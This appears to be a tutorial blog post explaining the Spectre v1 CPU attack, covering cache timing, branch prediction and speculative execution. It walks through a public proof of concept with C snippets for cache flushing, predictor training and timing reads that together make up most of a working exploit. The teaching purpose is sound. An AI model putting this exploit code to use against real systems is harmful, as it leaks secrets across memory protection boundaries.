Spectre and Cache
Resources
- https://www.freebuf.com/column/161135.html
- https://bbs.pediy.com/thread-230310.htm#msg_header_h1_0
- https://github.com/Eugnis/spectre-attack
Cache
We all know that accessing memory is very slow compared with the CPU's computation speed. To reduce the large amount of time spent waiting on memory accesses, the CPU cache was introduced.
This article will not cover the exact structure of the memory hierarchy; if you are interested in it, please refer to this.
Let's assume that our program performs this operation:
tmp = Array[x];
The CPU first tries to get Array[x] from the cache instead of from memory, and there are two possible situations:
- Array[x] is in the cache (a cache hit), so the CPU gets its value quickly.
- Array[x] is not in the cache (a cache miss), so the CPU has to access memory to get the value, which costs much more time.
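This timing difference is the whole basis of the attack, and it is easy to observe. Below is a minimal sketch of my own (not taken from the PoC), assuming an x86 CPU and GCC or Clang, that times one cached and one flushed read using the rdtscp and clflush intrinsics:

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* __rdtscp, _mm_clflush */

static uint8_t Array[4096];

/* Time a single read of *p in CPU cycles. */
static uint64_t time_read(volatile uint8_t *p) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                          /* the memory access being timed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    size_t x = 123;
    Array[x] = 1;                            /* touch it, so it is now in the cache */
    uint64_t hit = time_read(&Array[x]);     /* fast: served from the cache */
    _mm_clflush(&Array[x]);                  /* evict the cache line */
    uint64_t miss = time_read(&Array[x]);    /* slow: has to go to memory */
    printf("cached: %llu cycles, flushed: %llu cycles\n",
           (unsigned long long)hit, (unsigned long long)miss);
    return 0;
}

The exact numbers depend on the machine, but the flushed read is typically several times slower than the cached one.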
Branch Prediction and Speculative Execution
Modern CPUs are multi-core, multi-threaded and heavily pipelined, that is, they execute instructions in parallel. Therefore, if a branch condition depends on data that is not in the cache and can only be fetched from memory, the program does not serially block and wait for the memory access to finish before taking the branch; instead, the CPU attempts branch prediction and speculative execution. When the data comes back from memory, the CPU checks, based on the data and the logic of the branch condition, whether its speculation was valid. If it was invalid, the computed results are discarded and the previous state is restored; if it was valid, execution simply continues. This greatly improves the efficiency of the CPU.
But here is the catch: even if the results of speculative execution are discarded, the code executed speculatively may still have affected the CPU cache. When the CPU rolls back, it only restores the state of the relevant registers; the cache is not restored.
Let’s look at this demo:
// a1_size and a2 are not in the cache
if (idx < a1_size) tmp = a2[a1[idx]];
In the demo above, the CPU sees a conditional check, and because a1_size is not in the cache, it has to access memory to get its value. In the meantime, the CPU saves a checkpoint and speculatively executes the instructions behind the branch, treating idx as a value that is smaller than a1_size. If idx is large enough, this causes an out-of-bounds (OOB) read: a1[idx] is treated as an index into a2, and the CPU accesses memory based on a1[idx]. The data of a2 accessed this way ends up being loaded from memory into the CPU cache.
When a1_size finally arrives from memory, the CPU checks the branch condition again, finds that the condition is not met and that execution cannot continue along this path, discards the current results, restores the previous state, and continues with the other branch. But the data from a2 has already been brought into the CPU cache.
The demo is a little different from the real PoC, but it is easier to understand.
How does the PoC work?
The content we want to leak is defined as:
char* secret = "The Magic Words are Squeamish Ossifrage.";
malicious_x is the offset of secret relative to array1, so array1[malicious_x + i] addresses the byte secret[i]:
size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
int score[2], len = strlen(secret);
uint8_t value[2];
- value[0] stores the character with the highest hit count (the most likely character)
- value[1] stores the character with the second-highest hit count
- score[0] stores the number of hits for the most likely character
- score[1] stores the number of hits for the second most likely character
Guess the data byte by byte:
while (--len >= 0)
    readMemoryByte(malicious_x++, value, score);
Let's look inside readMemoryByte to see what happens.
In this function, we try up to 1000 times to guess the byte and break out early once the confidence condition is met, i.e. when the best candidate clearly dominates the runner-up:
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
At the beginning of each attempt, we need to flush array2 from the cache:
for (i = 0; i < 256; i++)
    _mm_clflush(&array2[i * 512]); /* evict every probe line of array2 */
Then there is another loop of 30 iterations, which can be viewed as five rounds of six iterations each. In every round, the first five iterations train the CPU's branch predictor, and the conditional-branch misprediction is triggered in the last one:
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
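In the linked PoC, the body of this loop looks roughly like the following (a sketch, variable names as in the repository). Note that x is selected without an if: an ordinary branch such as x = (j % 6 == 0) ? malicious_x : training_x; would itself influence the branch predictor, so the PoC computes the selection with bit tricks:

for (j = 29; j >= 0; j--) {
    _mm_clflush(&array1_size);                 /* make the bounds check miss the cache */
    for (volatile int z = 0; z < 100; z++) {}  /* small delay so the flush takes effect */

    /* Branchless select: x = malicious_x when j % 6 == 0, otherwise training_x */
    x = ((j % 6) - 1) & ~0xFFFF;               /* underflows only when j % 6 == 0 */
    x = (x | (x >> 16));                       /* all ones when j % 6 == 0, else 0 */
    x = training_x ^ (x & (malicious_x ^ training_x));

    victim_function(x);
}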
After these 30 iterations, the access time of every probed entry of array2 is measured through the cache side channel, and the ASCII value of the secret byte is deduced from which entry reads back fast:
/* Time reads. Order is lightly mixed up to prevent stride prediction */
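The timing itself looks roughly like this in the PoC (junk, addr, time1, time2 and mix_i are locals of readMemoryByte; CACHE_HIT_THRESHOLD is a tunable cycle threshold, 80 by default in the repository):

for (i = 0; i < 256; i++) {
    mix_i = ((i * 167) + 13) & 255;   /* visit the 256 entries in a scrambled order */
    addr = &array2[mix_i * 512];
    time1 = __rdtscp(&junk);          /* timestamp before the read */
    junk = *addr;                     /* the probed read */
    time2 = __rdtscp(&junk) - time1;  /* elapsed cycles */
    if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++;             /* fast read => this entry was cached => candidate byte */
}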
Finally, we need to find the highest and second-highest hit counts:
/* Locate highest & second-highest results tallies in j/k */
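A single pass over results[] is enough: j tracks the index with the most hits and k the runner-up, roughly:

j = k = -1;
for (i = 0; i < 256; i++) {
    if (j < 0 || results[i] >= results[j]) {
        k = j;       /* previous best becomes second best */
        j = i;       /* new best */
    } else if (k < 0 || results[i] >= results[k]) {
        k = i;       /* new second best */
    }
}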
As for victim_function, it is similar to the demo mentioned above:
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
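The line above is only the declaration of the global temp. The function itself is essentially the demo from earlier; in the linked PoC it looks roughly like this:

void victim_function(size_t x) {
    if (x < array1_size) {                /* bounds check that speculation bypasses */
        temp &= array2[array1[x] * 512];  /* leaves one cache line of array2 per possible byte value */
    }
}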
The first five iterations of each round are essentially training for the CPU. So when the branch check of the sixth iteration triggers speculative execution, the CPU is inclined to choose the "in-bounds" branch and execute it speculatively. After the bounds check actually fails, the speculative result is discarded, but the value of array2[array1[x] * 512] has already been stored in the cache. When the content of array2[mix_i * 512] is later read back, an abnormally fast read tells us that mix_i is the answer.
Postscript
Spectre is a novel cache-level attack technique. However, it also has its limitations: the attacker needs a rather large degree of freedom in memory allocation and process control, and it is difficult to find such an exploit at the application level.